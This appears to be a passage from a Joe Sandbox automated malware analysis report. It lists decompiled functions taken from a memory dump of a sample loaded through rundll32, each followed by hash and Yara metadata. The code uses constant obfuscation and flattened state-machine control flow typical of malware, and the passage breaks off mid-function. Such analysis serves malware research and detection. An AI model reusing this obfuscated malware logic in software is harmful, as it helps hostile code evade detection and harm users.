                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t55);
                                                                                                                                  				_v8 = 0x519131;
                                                                                                                                  				_v8 = _v8 ^ 0xec4619ea;
                                                                                                                                  				_v8 = _v8 + 0x48c3;
                                                                                                                                  				_v8 = _v8 ^ 0x9760daa2;
                                                                                                                                  				_v8 = _v8 ^ 0x7b7f7884;
                                                                                                                                  				_v16 = 0xb689a0;
                                                                                                                                  				_v16 = _v16 + 0x133d;
                                                                                                                                  				_v16 = _v16 ^ 0x00b72bb6;
                                                                                                                                  				_v12 = 0xec38eb;
                                                                                                                                  				_v12 = _v12 * 0x68;
                                                                                                                                  				_v12 = _v12 | 0x70f3e2c1;
                                                                                                                                  				_v12 = _v12 + 0xd290;
                                                                                                                                  				_v12 = _v12 ^ 0x7ff36ca2;
                                                                                                                                  				_v12 = 0x452aa4;
                                                                                                                                  				_v12 = _v12 ^ 0xbb670255;
                                                                                                                                  				_v12 = _v12 >> 1;
                                                                                                                                  				_v12 = _v12 * 0x2d;
                                                                                                                                  				_v12 = _v12 ^ 0x7280165f;
                                                                                                                                  				_v24 = 0xb68a33;
                                                                                                                                  				_v24 = _v24 + 0xffff2941;
                                                                                                                                  				_v24 = _v24 ^ 0x00b92c3b;
                                                                                                                                  				_v12 = 0x340add;
                                                                                                                                  				_v12 = _v12 | 0xd5e1d7f7;
                                                                                                                                  				_v12 = _v12 ^ 0xd5f6168b;
                                                                                                                                  				_v20 = 0x853d17;
                                                                                                                                  				_v20 = _v20 + 0xcd4d;
                                                                                                                                  				_v20 = _v20 ^ 0x00837917;
                                                                                                                                  				return E002DA30C(_v12, _a4, E002D1DB9(__ecx), _v20);
                                                                                                                                  			}










                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 8
                                                                                                                                  • API String ID: 0-719543824
                                                                                                                                  • Opcode ID: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                                  • Instruction ID: c6a27eb9389ef0e782f5009104ef47d7244f080e23afc6cd2c5f2a08fb2c080b
                                                                                                                                  • Opcode Fuzzy Hash: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                                  • Instruction Fuzzy Hash: E021A2B5C00209EBCF48DFE5CA8689EBFB5FF40314F6081899411B6261D3B54B549F95
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                  			E002D4346(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				signed int _v4;
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				void* _t146;
                                                                                                                                  				void* _t165;
                                                                                                                                  				signed int _t170;
                                                                                                                                  				signed int _t171;
                                                                                                                                  				signed int _t172;
                                                                                                                                  				signed int _t173;
                                                                                                                                  				signed int _t174;
                                                                                                                                  				void* _t177;
                                                                                                                                  				intOrPtr* _t196;
                                                                                                                                  				void* _t197;
                                                                                                                                  				signed int* _t200;
                                                                                                                                  
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_t196 = __ecx;
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t146);
                                                                                                                                  				_v8 = 0x1587dd;
                                                                                                                                  				_t200 =  &(( &_v72)[4]);
                                                                                                                                  				_t197 = 0;
                                                                                                                                  				_v4 = _v4 & 0;
                                                                                                                                  				_t177 = 0x762b00a;
                                                                                                                                  				_v40 = 0x54d1b5;
                                                                                                                                  				_t170 = 0x79;
                                                                                                                                  				_v40 = _v40 / _t170;
                                                                                                                                  				_v40 = _v40 ^ 0x0000b372;
                                                                                                                                  				_v16 = 0xa1afdd;
                                                                                                                                  				_v16 = _v16 >> 0xd;
                                                                                                                                  				_v16 = _v16 ^ 0x0000050c;
                                                                                                                                  				_v68 = 0x910a11;
                                                                                                                                  				_t171 = 0x13;
                                                                                                                                  				_v68 = _v68 / _t171;
                                                                                                                                  				_v68 = _v68 << 2;
                                                                                                                                  				_v68 = _v68 + 0x13e3;
                                                                                                                                  				_v68 = _v68 ^ 0x00184f98;
                                                                                                                                  				_v32 = 0xaf4665;
                                                                                                                                  				_t172 = 0x26;
                                                                                                                                  				_v32 = _v32 * 0x1c;
                                                                                                                                  				_v32 = _v32 ^ 0x13220c8d;
                                                                                                                                  				_v56 = 0xf39368;
                                                                                                                                  				_v56 = _v56 + 0xf012;
                                                                                                                                  				_v56 = _v56 / _t172;
                                                                                                                                  				_v56 = _v56 ^ 0x000d8e66;
                                                                                                                                  				_v36 = 0xa121b7;
                                                                                                                                  				_v36 = _v36 + 0x3186;
                                                                                                                                  				_v36 = _v36 ^ 0x00aec580;
                                                                                                                                  				_v72 = 0x8bd634;
                                                                                                                                  				_t173 = 0x16;
                                                                                                                                  				_v72 = _v72 / _t173;
                                                                                                                                  				_v72 = _v72 | 0xc3992ef3;
                                                                                                                                  				_v72 = _v72 + 0xf49;
                                                                                                                                  				_v72 = _v72 ^ 0xc3912c07;
                                                                                                                                  				_v24 = 0xbc86c6;
                                                                                                                                  				_v24 = _v24 | 0x4f3bdf6c;
                                                                                                                                  				_v24 = _v24 ^ 0x4fbb36fd;
                                                                                                                                  				_v64 = 0xf11315;
                                                                                                                                  				_v64 = _v64 | 0x791eed70;
                                                                                                                                  				_v64 = _v64 + 0xffff781b;
                                                                                                                                  				_v64 = _v64 | 0xb4748ed7;
                                                                                                                                  				_v64 = _v64 ^ 0xfdf43fb6;
                                                                                                                                  				_v28 = 0xa9ea5e;
                                                                                                                                  				_v28 = _v28 << 9;
                                                                                                                                  				_v28 = _v28 ^ 0x53d38433;
                                                                                                                                  				_v44 = 0xab8ea7;
                                                                                                                                  				_t174 = 0x5e;
                                                                                                                                  				_v44 = _v44 / _t174;
                                                                                                                                  				_v44 = _v44 >> 5;
                                                                                                                                  				_v44 = _v44 ^ 0x00061aeb;
                                                                                                                                  				_v48 = 0xf3254f;
                                                                                                                                  				_v48 = _v48 + 0xffff7d1c;
                                                                                                                                  				_v48 = _v48 ^ 0x338af708;
                                                                                                                                  				_v48 = _v48 ^ 0x337c7814;
                                                                                                                                  				_v60 = 0xe02c97;
                                                                                                                                  				_v60 = _v60 * 0x4f;
                                                                                                                                  				_v60 = _v60 + 0xffffa06e;
                                                                                                                                  				_v60 = _v60 + 0x8165;
                                                                                                                                  				_v60 = _v60 ^ 0x4522059f;
                                                                                                                                  				_v52 = 0x13fe8b;
                                                                                                                                  				_v52 = _v52 >> 6;
                                                                                                                                  				_v52 = _v52 + 0xffffbd6d;
                                                                                                                                  				_v52 = _v52 ^ 0x000eeb0b;
                                                                                                                                  				_v20 = 0x7ee5fd;
                                                                                                                                  				_v20 = _v20 | 0xb1050693;
                                                                                                                                  				_v20 = _v20 ^ 0xb17ba1e4;
                                                                                                                                  				do {
                                                                                                                                  					while(_t177 != 0x29b5a10) {
                                                                                                                                  						if(_t177 == 0x761c4cc) {
                                                                                                                                  							_push(_t177);
                                                                                                                                  							_t165 = E002DAE64(_v68, _t177, _a4, 0, _v56, _t177, _v36,  &_v12, _v40, _v72);
                                                                                                                                  							_t200 =  &(_t200[0xa]);
                                                                                                                                  							if(_t165 != 0) {
                                                                                                                                  								_t177 = 0x29b5a10;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							if(_t177 == 0x762b00a) {
                                                                                                                                  								_t177 = 0x761c4cc;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t177 != 0x7f1be9f) {
                                                                                                                                  									goto L13;
                                                                                                                                  								} else {
                                                                                                                                  									_push(_t177);
                                                                                                                                  									E002DAE64(_v44, _t177, _a4, _t197, _v60, _t177, _v52,  &_v12, _v16, _v20);
                                                                                                                                  									 *_t196 = _v12;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L6:
                                                                                                                                  						return _t197;
                                                                                                                                  					}
                                                                                                                                  					_push(_t177);
                                                                                                                                  					_push(_t177);
                                                                                                                                  					_t197 = E002D7FF2(_v12);
                                                                                                                                  					if(_t197 == 0) {
                                                                                                                                  						_t177 = 0xc410c1b;
                                                                                                                                  						goto L13;
                                                                                                                                  					} else {
                                                                                                                                  						_t177 = 0x7f1be9f;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					goto L6;
                                                                                                                                  					L13:
                                                                                                                                  				} while (_t177 != 0xc410c1b);
                                                                                                                                  				goto L6;
                                                                                                                                  			}

































                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                                  • Instruction ID: 95b878d80e84a08dc73784530c013c9eb565421ac534a2f83bd840c7faa05270
                                                                                                                                  • Opcode Fuzzy Hash: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                                  • Instruction Fuzzy Hash: 937154B21193419FD358DF21D98982BBBF1EBD5718F40890DF29656260D3B2C919CF83
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                  			E002E894B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                  				char _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				void* _t97;
                                                                                                                                  				void* _t111;
                                                                                                                                  				void* _t115;
                                                                                                                                  				void* _t117;
                                                                                                                                  				void* _t135;
                                                                                                                                  				void* _t136;
                                                                                                                                  				signed int _t137;
                                                                                                                                  				signed int _t138;
                                                                                                                                  				signed int _t139;
                                                                                                                                  				signed int _t140;
                                                                                                                                  				void* _t142;
                                                                                                                                  				void* _t143;
                                                                                                                                  
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_t115 = __edx;
                                                                                                                                  				_t135 = __ecx;
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t97);
                                                                                                                                  				_v64 = 0x51cd23;
                                                                                                                                  				_t143 = _t142 + 0x18;
                                                                                                                                  				_t136 = 0;
                                                                                                                                  				_t117 = 0x1f0121b;
                                                                                                                                  				_t137 = 0x4d;
                                                                                                                                  				_v64 = _v64 / _t137;
                                                                                                                                  				_v64 = _v64 >> 9;
                                                                                                                                  				_v64 = _v64 ^ 0x00032222;
                                                                                                                                  				_v68 = 0xd4b8b7;
                                                                                                                                  				_v68 = _v68 + 0xffffd2af;
                                                                                                                                  				_v68 = _v68 ^ 0xd36e67b3;
                                                                                                                                  				_v68 = _v68 ^ 0xd3b4aa1e;
                                                                                                                                  				_v76 = 0x6efd74;
                                                                                                                                  				_v76 = _v76 << 5;
                                                                                                                                  				_v76 = _v76 ^ 0x2f6bad1f;
                                                                                                                                  				_t138 = 0x34;
                                                                                                                                  				_v76 = _v76 / _t138;
                                                                                                                                  				_v76 = _v76 ^ 0x00af6c6b;
                                                                                                                                  				_v52 = 0x9958c4;
                                                                                                                                  				_v52 = _v52 + 0xffff4241;
                                                                                                                                  				_v52 = _v52 ^ 0x009a50fc;
                                                                                                                                  				_v56 = 0x2e84bf;
                                                                                                                                  				_t139 = 0x72;
                                                                                                                                  				_v56 = _v56 * 0x77;
                                                                                                                                  				_v56 = _v56 ^ 0x15969b56;
                                                                                                                                  				_v80 = 0x2bfbd3;
                                                                                                                                  				_v80 = _v80 | 0xbb654ab5;
                                                                                                                                  				_v80 = _v80 * 0x48;
                                                                                                                                  				_v80 = _v80 >> 8;
                                                                                                                                  				_v80 = _v80 ^ 0x00b72d27;
                                                                                                                                  				_v60 = 0xb8f349;
                                                                                                                                  				_v60 = _v60 / _t139;
                                                                                                                                  				_v60 = _v60 ^ 0xcb885b35;
                                                                                                                                  				_v60 = _v60 ^ 0xcb801a24;
                                                                                                                                  				_v72 = 0xbf562d;
                                                                                                                                  				_t140 = 0x42;
                                                                                                                                  				_v72 = _v72 / _t140;
                                                                                                                                  				_v72 = _v72 ^ 0xd5944d41;
                                                                                                                                  				_v72 = _v72 ^ 0x4a8545c0;
                                                                                                                                  				_v72 = _v72 ^ 0x9f1c34cb;
                                                                                                                                  				_v48 = 0xda7c79;
                                                                                                                                  				_v48 = _v48 << 0xc;
                                                                                                                                  				_v48 = _v48 ^ 0xa7c49699;
                                                                                                                                  				do {
                                                                                                                                  					while(_t117 != 0x1f0121b) {
                                                                                                                                  						if(_t117 == 0x20f75ec) {
                                                                                                                                  							E002D3DBC( &_v44, _t115, _v64, _v68, _v76);
                                                                                                                                  							_t143 = _t143 + 0xc;
                                                                                                                                  							_t117 = 0x98c428b;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t117 == 0x98c428b) {
                                                                                                                                  								_t111 = E002D2A21(_v52, _v56,  &_v44, _t135, _v80);
                                                                                                                                  								_t143 = _t143 + 0xc;
                                                                                                                                  								__eflags = _t111;
                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                  									_t117 = 0xea94eac;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								_t149 = _t117 - 0xea94eac;
                                                                                                                                  								if(_t117 != 0xea94eac) {
                                                                                                                                  									goto L11;
                                                                                                                                  								} else {
                                                                                                                                  									E002ED97D( &_v44, _v60, _t149, _v72, _t135 + 4, _v48);
                                                                                                                                  									_t136 =  !=  ? 1 : _t136;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L6:
                                                                                                                                  						return _t136;
                                                                                                                                  					}
                                                                                                                                  					_t117 = 0x20f75ec;
                                                                                                                                  					L11:
                                                                                                                                  					__eflags = _t117 - 0x3544eb3;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				goto L6;
                                                                                                                                  			}


























                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                                  • Instruction ID: 93bbe1fa51973814206e9a3b9593943ad9e858ef3dcfb7cff86a87cec11d1144
                                                                                                                                  • Opcode Fuzzy Hash: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                                  • Instruction Fuzzy Hash: AE519A71148341AFC754CF22C98581BBBE5FBD8708F50992EF59996220D772CA29CF87
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                  			E002EAC3A(void* __ecx) {
                                                                                                                                  				signed int _v4;
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				void* _t82;
                                                                                                                                  				signed int _t85;
                                                                                                                                  				signed int _t86;
                                                                                                                                  				void* _t88;
                                                                                                                                  				void* _t96;
                                                                                                                                  				void* _t97;
                                                                                                                                  				signed int* _t99;
                                                                                                                                  
                                                                                                                                  				_t88 = __ecx;
                                                                                                                                  				_t99 =  &_v28;
                                                                                                                                  				_v24 = 0x5aa995;
                                                                                                                                  				_v24 = _v24 | 0x25663b9c;
                                                                                                                                  				_v24 = _v24 << 6;
                                                                                                                                  				_t85 = 0x11;
                                                                                                                                  				_v24 = _v24 / _t85;
                                                                                                                                  				_t96 = 0;
                                                                                                                                  				_v24 = _v24 ^ 0x05a97123;
                                                                                                                                  				_t97 = 0xfe6f9f;
                                                                                                                                  				_v16 = 0x9f09af;
                                                                                                                                  				_v16 = _v16 + 0xcb37;
                                                                                                                                  				_v16 = _v16 ^ 0x3a843722;
                                                                                                                                  				_v16 = _v16 ^ 0x3a14bc19;
                                                                                                                                  				_v28 = 0x7e93e4;
                                                                                                                                  				_v28 = _v28 << 0xa;
                                                                                                                                  				_t86 = 0x1a;
                                                                                                                                  				_v28 = _v28 / _t86;
                                                                                                                                  				_v28 = _v28 ^ 0x4056cd73;
                                                                                                                                  				_v28 = _v28 ^ 0x49f3cf3d;
                                                                                                                                  				_v4 = 0x47c602;
                                                                                                                                  				_v4 = _v4 ^ 0xe3aa640e;
                                                                                                                                  				_v4 = _v4 | 0xd85731ad;
                                                                                                                                  				_v4 = _v4 ^ 0xfbf46e2b;
                                                                                                                                  				_v8 = 0x201e29;
                                                                                                                                  				_v8 = _v8 << 0x10;
                                                                                                                                  				_v8 = _v8 * 0x48;
                                                                                                                                  				_v8 = _v8 ^ 0x7b8200e2;
                                                                                                                                  				_v12 = 0x18f9c1;
                                                                                                                                  				_v12 = _v12 * 0x54;
                                                                                                                                  				_v12 = _v12 << 6;
                                                                                                                                  				_v12 = _v12 ^ 0x0c72dcb8;
                                                                                                                                  				_v20 = 0xd6b502;
                                                                                                                                  				_v20 = _v20 * 0x55;
                                                                                                                                  				_v20 = _v20 << 0xd;
                                                                                                                                  				_v20 = _v20 >> 0xb;
                                                                                                                                  				_v20 = _v20 ^ 0x00034ef9;
                                                                                                                                  				do {
                                                                                                                                  					while(_t97 != 0xfe6f9f) {
                                                                                                                                  						if(_t97 == 0x2f82a60) {
                                                                                                                                  							_push(_t88);
                                                                                                                                  							_push(_t88);
                                                                                                                                  							_t82 = E002D474B();
                                                                                                                                  							_t99 =  &(_t99[2]);
                                                                                                                                  							_t97 = 0x6e030e4;
                                                                                                                                  							_t96 = _t96 + _t82;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t97 != 0x6e030e4) {
                                                                                                                                  								goto L8;
                                                                                                                                  							} else {
                                                                                                                                  								_t96 = _t96 + E002EC2F8(_v4, _t88 + 4, _v8, _v12, _v20);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L5:
                                                                                                                                  						return _t96;
                                                                                                                                  					}
                                                                                                                                  					_t97 = 0x2f82a60;
                                                                                                                                  					L8:
                                                                                                                                  				} while (_t97 != 0xea6061f);
                                                                                                                                  				goto L5;
                                                                                                                                  			}


















                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • Opcode ID: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                                  • Instruction ID: 467f6f616c9e5317bc4e96019c0c0f760495dfdca1cdcda760708c93b15fdda5
                                                                                                                                  • Opcode Fuzzy Hash: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                                  • Instruction Fuzzy Hash: 423176724083428BC318CF25C88540BFBE0FBD8788F508A1DF599A7220D3B5DA59CB97
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E002D8969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				intOrPtr _v44;
                                                                                                                                  				void* _t84;
                                                                                                                                  				signed int _t99;
                                                                                                                                  				signed int _t103;
                                                                                                                                  				void* _t109;
                                                                                                                                  				signed int _t110;
                                                                                                                                  
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_t109 = __edx;
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				E002E20B9(_t84);
                                                                                                                                  				_v40 = _v40 & 0x00000000;
                                                                                                                                  				_v36 = _v36 & 0x00000000;
                                                                                                                                  				_v44 = 0x779abe;
                                                                                                                                  				_v20 = 0xb5573d;
                                                                                                                                  				_v20 = _v20 ^ 0xbb0d078e;
                                                                                                                                  				_t103 = 0x58;
                                                                                                                                  				_v20 = _v20 * 0x30;
                                                                                                                                  				_v20 = _v20 ^ 0x328c396d;
                                                                                                                                  				_v16 = 0x362481;
                                                                                                                                  				_v16 = _v16 + 0x16cb;
                                                                                                                                  				_v16 = _v16 | 0xfe676eb4;
                                                                                                                                  				_v16 = _v16 ^ 0xfe76a30b;
                                                                                                                                  				_v32 = 0xc91798;
                                                                                                                                  				_v32 = _v32 * 0x65;
                                                                                                                                  				_v32 = _v32 ^ 0x4f59c84a;
                                                                                                                                  				_v28 = 0xb97254;
                                                                                                                                  				_v28 = _v28 / _t103;
                                                                                                                                  				_v28 = _v28 ^ 0x000673a7;
                                                                                                                                  				_v12 = 0xb6c56;
                                                                                                                                  				_v12 = _v12 * 0x2a;
                                                                                                                                  				_v12 = _v12 << 1;
                                                                                                                                  				_v12 = _v12 * 0x5b;
                                                                                                                                  				_v12 = _v12 ^ 0x5515a6e4;
                                                                                                                                  				_v8 = 0x1f2e02;
                                                                                                                                  				_v8 = _v8 * 0x66;
                                                                                                                                  				_v8 = _v8 * 0x79;
                                                                                                                                  				_v8 = _v8 + 0xffff535b;
                                                                                                                                  				_v8 = _v8 ^ 0xdf3e36a5;
                                                                                                                                  				_v24 = 0x692813;
                                                                                                                                  				_v24 = _v24 >> 0xb;
                                                                                                                                  				_v24 = _v24 + 0xffffcb9d;
                                                                                                                                  				_v24 = _v24 ^ 0xfffb0f76;
                                                                                                                                  				E002ED25E(_t103);
                                                                                                                                  				_v16 = 0x87422f;
                                                                                                                                  				_v16 = _v16 | 0xfc58150b;
                                                                                                                                  				_v16 = _v16 ^ 0xfcdf572b;
                                                                                                                                  				_v20 = 0xc6266d;
                                                                                                                                  				_v20 = _v20 << 0xa;
                                                                                                                                  				_v20 = _v20 + 0xffff7638;
                                                                                                                                  				_v20 = _v20 ^ 0x18992a28;
                                                                                                                                  				_t99 = E002E0AE0(_v20, _v16);
                                                                                                                                  				_push(_v24);
                                                                                                                                  				_t110 = _t99;
                                                                                                                                  				_push(_t109);
                                                                                                                                  				_push(_t110);
                                                                                                                                  				_push(1);
                                                                                                                                  				E002D80E3(_v12, _v8);
                                                                                                                                  				 *((short*)(_t109 + _t110 * 2)) = 0;
                                                                                                                                  				return 0;
                                                                                                                                  			}



















                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                                  • Instruction ID: 7bd997e514695ed2f1f7847f62b883445238ab75ae85df1f631ecea94c625a2e
                                                                                                                                  • Opcode Fuzzy Hash: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                                  • Instruction Fuzzy Hash: 4141FD71C1021AEBCF18CFE5C98A9EEBFB0FB44314F108189D525AA260D3B84B85CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E002EDBEA(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				void* _t74;
                                                                                                                                  				char* _t82;
                                                                                                                                  				signed int _t84;
                                                                                                                                  
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_t82 = __edx;
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				E002E20B9(_t74);
                                                                                                                                  				_v20 = _v20 & 0x00000000;
                                                                                                                                  				_v16 = _v16 & 0x00000000;
                                                                                                                                  				_v28 = 0x71ca23;
                                                                                                                                  				_v24 = 0x57f692;
                                                                                                                                  				_v12 = 0xd3252c;
                                                                                                                                  				_v12 = _v12 + 0x4351;
                                                                                                                                  				_v12 = _v12 + 0xffff5b79;
                                                                                                                                  				_v12 = _v12 ^ 0x00d2c3f6;
                                                                                                                                  				_v8 = 0xbb067e;
                                                                                                                                  				_t84 = 0x11;
                                                                                                                                  				_v8 = _v8 / _t84;
                                                                                                                                  				_v8 = _v8 >> 8;
                                                                                                                                  				_v8 = _v8 ^ 0xac5d3832;
                                                                                                                                  				_v8 = _v8 ^ 0xac5d3334;
                                                                                                                                  				_v8 = 0xab60c2;
                                                                                                                                  				_v8 = _v8 << 0x10;
                                                                                                                                  				_v8 = _v8 ^ 0x910d5570;
                                                                                                                                  				_v8 = _v8 >> 4;
                                                                                                                                  				_v8 = _v8 ^ 0x0f1cf547;
                                                                                                                                  				if( *__edx != 0) {
                                                                                                                                  					do {
                                                                                                                                  						_v8 = 0xbb067e;
                                                                                                                                  						_v8 = _v8 / _t84;
                                                                                                                                  						_v8 = _v8 >> 8;
                                                                                                                                  						_v8 = _v8 ^ 0xac5d3832;
                                                                                                                                  						_v8 = _v8 ^ 0xac5d3334;
                                                                                                                                  						_v8 = 0xab60c2;
                                                                                                                                  						_v8 = _v8 << 0x10;
                                                                                                                                  						_v8 = _v8 ^ 0x910d5570;
                                                                                                                                  						_v8 = _v8 >> 4;
                                                                                                                                  						_v8 = _v8 ^ 0x0f1cf547;
                                                                                                                                  						_v12 =  *_t82;
                                                                                                                                  						_v12 = _v12 + (_v12 << _v8);
                                                                                                                                  						_v12 = _v12 + (_v12 << _v8);
                                                                                                                                  						_v12 = _v12 - _v12;
                                                                                                                                  						_t82 = _t82 + 1;
                                                                                                                                  						_t84 = 0x11;
